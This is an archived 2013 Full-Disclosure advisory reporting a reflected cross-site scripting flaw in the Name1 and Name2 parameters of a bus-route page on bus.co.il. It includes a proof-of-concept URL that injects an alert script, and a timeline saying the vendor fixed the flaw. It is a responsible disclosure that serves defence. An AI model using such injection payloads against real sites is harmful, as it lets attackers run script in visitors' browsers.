| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CABsCEg2cmCbLAGLZWNu1R-toR9njYkd4qcoUXgoJL4-nx1cZ5g@mail.gmail.com> Date: Mon, 8 Jul 2013 16:29:15 +0300 From: LIAD Mizrachi <liadmz@...il.com> To: full-disclosure <full-disclosure@...ts.grok.org.uk> Subject: Bus.co.il - Route.asp Cross-site Scripting vulnerability Advisory: www.bus.co.il - Route.asp Cross-site Scripting vulnerability Author: Liad Mizrachi Vendor URL: http://www.bus.co.il Vulnerability Status: Fixed ========================== Vulnerability Description ========================== 'Name1' & 'Name2' - Parameters in "Route.asp" are prone to a XSS. ========================== PoC ========================== // IE 9 & FF 21.0 http://www.bus.co.il/otobusim/Front2007/Route.asp?RouteID=1&PlaceID1=196357&BuildingNumber1=0&PlaceID2=347360&BuildingNumber2=0&Name1=%3cscript%3ealert(%22XSS%22)%3c/script%3e&Name2=%D7%91%D7%AA+%D7%99%D7%9D+-+%D7%A1%D7%9E%D7%98%D7%AA+%D7%94%D7%A8%D7%90%D7%A9%D7%95%D7%A0%D7%99%D7%9D&StartPlaceID1=639500&EndPlaceID1=619400&DepTime1=17:02&ArrTime1=17:25&TravelID1=380437889&LineID1=4563409&LineCompanyID1=1010&BeforeWalkTime1=0:01&AfterWalkTime=5.17572916666653E-03&LanguageID=&Design=2007 ========================== Solution ========================== fixed by vendor (verified) ========================== Disclosure Timeline ========================== 24-June-2013 - vendor informed by mail 27-June-2013 - fixed by the vendor ========================== References ========================== http://www.bus.co.il/ http://picturepush.com/public/13422462 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists